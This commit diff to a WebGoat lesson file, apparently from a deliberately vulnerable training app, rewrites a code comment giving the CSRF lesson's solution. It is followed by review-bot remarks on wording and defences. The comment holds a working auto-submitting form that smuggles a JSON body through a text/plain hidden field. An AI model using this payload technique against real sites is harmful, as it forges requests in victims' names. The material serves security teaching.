docs(CSRFFeedback.java): fixed one invalid solution about CSRF attack (#2010)
Co-authored-by: HackHuang <GoogTech@outlook.com> Co-authored-by: HackHuang <hi@goog.tech>
		| @ -115,10 +115,13 @@ public class CSRFFeedback implements AssignmentEndpoint { | ||||
|     return false; | ||||
|   } | ||||
|  | ||||
|   /** | ||||
|    * Solution <form name="attack" enctype="text/plain" | ||||
|    * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input | ||||
|    * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service", | ||||
|    * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script> | ||||
|   /* | ||||
|    * Solution: | ||||
|    * <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> | ||||
|    *    <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} --> | ||||
|    *    <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'> | ||||
|    * </form> | ||||
|    * <script>document.attack.submit();</script> | ||||
|    */ | ||||
|  | ||||
| } | ||||
|  | ||||
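Review bot: The explanatory line inside the new comment (`<!-- Construct valid JSON data: ... -->`) calls the result valid JSON but writes it with unquoted keys, and it never says where the trailing `=` in the message comes from. I would reword it to something like `<!-- text/plain sends the field as name=value, so the '=' lands inside the "message" string and the body still parses as JSON -->`. The block also changed from `/**` to `/*` and sits at the end of the class, attached to no declaration, so it should name the handler it belongs to. For learners it would help to state the control the lesson presumably motivates, strict `Content-Type` enforcement plus an anti-CSRF token; that is inferred, because the handler is outside this hunk. The class body begins above the hunk.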